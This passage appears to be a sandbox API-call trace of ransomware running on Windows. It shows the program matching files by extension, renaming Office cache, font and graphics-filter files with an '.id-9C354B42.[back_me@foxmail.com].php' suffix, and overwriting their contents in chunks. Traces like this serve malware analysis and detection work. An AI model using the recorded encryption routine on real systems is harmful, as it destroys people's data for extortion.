files\\microsoft shared\\grphflt\\ms.cgm")) returned 1 [0057.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.065] lstrlenW (lpString=".doc") returned 4 [0057.065] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0057.065] lstrlenW (lpString=".docx") returned 5 [0057.065] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0057.065] lstrlenW (lpString=".pdf") returned 4 [0057.065] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0057.065] lstrlenW (lpString=".xls") returned 4 [0057.065] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0057.065] lstrlenW (lpString=".xlsx") returned 5 [0057.065] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0057.065] lstrlenW (lpString=".ppt") returned 4 [0057.065] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0057.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.065] lstrlenW (lpString=".zip") returned 4 [0057.065] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0057.065] lstrlenW (lpString=".rar") returned 4 [0057.065] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0057.065] lstrlenW (lpString=".bz2") returned 4 [0057.065] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0057.065] lstrlenW (lpString=".7z") returned 3 [0057.065] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0057.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.065] lstrlenW (lpString=".dbf") returned 4 [0057.065] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0057.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.065] lstrlenW (lpString=".1cd") returned 4 [0057.065] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0057.065] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.065] lstrlenW (lpString=".jpg") returned 4 [0057.065] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0057.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.066] lstrlenW (lpString=".doc") returned 4 [0057.066] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0057.066] lstrlenW (lpString=".docx") returned 5 [0057.066] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0057.066] lstrlenW (lpString=".pdf") returned 4 [0057.066] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0057.066] lstrlenW (lpString=".xls") returned 4 [0057.066] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0057.066] lstrlenW (lpString=".xlsx") returned 5 [0057.066] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0057.066] lstrlenW (lpString=".ppt") returned 4 [0057.066] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0057.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.066] lstrlenW (lpString=".zip") returned 4 [0057.066] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0057.066] lstrlenW (lpString=".rar") returned 4 [0057.066] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0057.066] lstrlenW (lpString=".bz2") returned 4 [0057.066] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0057.066] lstrlenW (lpString=".7z") returned 3 [0057.066] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0057.066] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.066] lstrlenW (lpString=".dbf") returned 4 [0057.066] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0057.067] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.067] lstrlenW (lpString=".1cd") returned 4 [0057.067] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0057.067] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0057.067] lstrlenW (lpString=".jpg") returned 4 [0057.067] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0057.067] lstrcmpiW (lpString1=".WPG", lpString2=".php") returned 1 [0057.067] lstrlenW (lpString="MS.WPG") returned 6 [0057.067] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.067] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=1382) returned 1 [0057.067] CloseHandle (hObject=0x230) returned 1 [0057.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 0x20 [0057.067] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0057.068] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.068] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.068] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.068] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0057.068] GetLastError () returned 0x0 [0057.068] ReadFile (in: hFile=0x230, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x566, lpOverlapped=0x0) returned 1 [0057.181] WriteFile (in: hFile=0x228, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x570, lpOverlapped=0x0) returned 1 [0057.182] ReadFile (in: hFile=0x230, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.182] WriteFile (in: hFile=0x228, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0057.182] SetEndOfFile (hFile=0x228) Thread: id = 17 os_tid = 0x9bc [0034.894] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2ef10b0 [0034.894] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2f010b8 [0034.894] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8068 [0034.894] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xbf8d28 [0034.895] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8080 [0034.895] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x40c0020 [0034.895] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8098 [0034.895] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba8098, Size=0x20) returned 0xb90270 [0034.895] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba8098 [0034.895] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba8098, Size=0x20) returned 0xb902c0 [0034.895] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.895] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.895] Wow64DisableWow64FsRedirection (in: OldValue=0x38bff58 | out: OldValue=0x38bff58*=0x0) returned 1 [0034.895] lstrlenW (lpString="kernel32.dll") returned 12 [0034.895] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90270 | out: hHeap=0xb10000) returned 1 [0034.895] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.895] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb902c0 | out: hHeap=0xb10000) returned 1 [0034.896] Sleep (dwMilliseconds=0x64) [0035.248] lstrcmpiW (lpString1=".ttf", lpString2=".php") returned 1 [0035.248] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0035.248] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.710] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=1984228) returned 1 [0035.710] CloseHandle (hObject=0x1b4) returned 1 [0035.710] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0035.710] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.711] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0035.711] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.711] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.711] lstrlenW (lpString=".doc") returned 4 [0035.711] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.711] lstrlenW (lpString=".docx") returned 5 [0035.711] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.711] lstrlenW (lpString=".pdf") returned 4 [0035.711] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.711] lstrlenW (lpString=".xls") returned 4 [0035.711] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.711] lstrlenW (lpString=".xlsx") returned 5 [0035.711] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.711] lstrlenW (lpString=".ppt") returned 4 [0035.711] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.711] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.711] lstrlenW (lpString=".zip") returned 4 [0035.711] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.711] lstrlenW (lpString=".rar") returned 4 [0035.711] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.711] lstrlenW (lpString=".bz2") returned 4 [0035.711] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.711] lstrlenW (lpString=".7z") returned 3 [0035.711] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.711] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.711] lstrlenW (lpString=".dbf") returned 4 [0035.711] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.711] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.711] lstrlenW (lpString=".1cd") returned 4 [0035.711] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.711] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.711] lstrlenW (lpString=".jpg") returned 4 [0035.712] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.712] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.712] lstrlenW (lpString=".doc") returned 4 [0035.712] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString=".docx") returned 5 [0035.712] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.712] lstrlenW (lpString=".pdf") returned 4 [0035.712] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString=".xls") returned 4 [0035.712] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.712] lstrlenW (lpString=".xlsx") returned 5 [0035.712] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.712] lstrlenW (lpString=".ppt") returned 4 [0035.712] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.712] lstrlenW (lpString=".zip") returned 4 [0035.712] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.712] lstrlenW (lpString=".rar") returned 4 [0035.712] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString=".bz2") returned 4 [0035.712] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString=".7z") returned 3 [0035.712] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.712] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.712] lstrlenW (lpString=".dbf") returned 4 [0035.712] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.712] lstrlenW (lpString=".1cd") returned 4 [0035.712] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.712] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26 [0035.712] lstrlenW (lpString=".jpg") returned 4 [0035.712] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.713] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0035.713] lstrlenW (lpString="PptLR.cab") returned 9 [0035.713] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.727] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=70361744) returned 1 [0035.727] CloseHandle (hObject=0x1b4) returned 1 [0035.727] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020 [0035.727] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.727] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0035.729] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.729] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0035.729] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0035.729] ReadFile (in: hFile=0x1b4, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.743] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0035.743] ReadFile (in: hFile=0x1b4, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.749] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.749] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0035.750] ReadFile (in: hFile=0x1b4, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.256] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.256] WriteFile (in: hFile=0x1b4, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0036.274] SetEndOfFile (hFile=0x1b4) returned 1 [0036.274] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0036.274] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.274] WriteFile (in: hFile=0x1b4, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.275] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.275] WriteFile (in: hFile=0x1b4, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.275] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0036.275] WriteFile (in: hFile=0x1b4, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.277] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0036.277] CloseHandle (hObject=0x1b4) returned 1 [0039.451] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0039.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.511] lstrlenW (lpString=".doc") returned 4 [0039.511] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.511] lstrlenW (lpString=".docx") returned 5 [0039.511] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.511] lstrlenW (lpString=".pdf") returned 4 [0039.511] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.511] lstrlenW (lpString=".xls") returned 4 [0039.511] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.511] lstrlenW (lpString=".xlsx") returned 5 [0039.511] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.511] lstrlenW (lpString=".ppt") returned 4 [0039.511] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.511] lstrlenW (lpString=".zip") returned 4 [0039.511] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.511] lstrlenW (lpString=".rar") returned 4 [0039.511] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.511] lstrlenW (lpString=".bz2") returned 4 [0039.511] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.511] lstrlenW (lpString=".7z") returned 3 [0039.511] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.511] lstrlenW (lpString=".dbf") returned 4 [0039.511] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.511] lstrlenW (lpString=".1cd") returned 4 [0039.511] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.511] lstrlenW (lpString=".jpg") returned 4 [0039.511] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.512] lstrlenW (lpString=".doc") returned 4 [0039.512] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString=".docx") returned 5 [0039.512] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.512] lstrlenW (lpString=".pdf") returned 4 [0039.512] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString=".xls") returned 4 [0039.512] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString=".xlsx") returned 5 [0039.512] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.512] lstrlenW (lpString=".ppt") returned 4 [0039.512] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.512] lstrlenW (lpString=".zip") returned 4 [0039.512] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString=".rar") returned 4 [0039.512] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString=".bz2") returned 4 [0039.512] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.512] lstrlenW (lpString=".7z") returned 3 [0039.512] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.512] lstrlenW (lpString=".dbf") returned 4 [0039.512] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.512] lstrlenW (lpString=".1cd") returned 4 [0039.512] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0039.512] lstrlenW (lpString=".jpg") returned 4 [0039.512] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.513] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0039.513] lstrlenW (lpString="WordLR.cab") returned 10 [0039.513] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0039.513] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=43806141) returned 1 [0039.513] CloseHandle (hObject=0x1e8) returned 1 [0039.513] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all 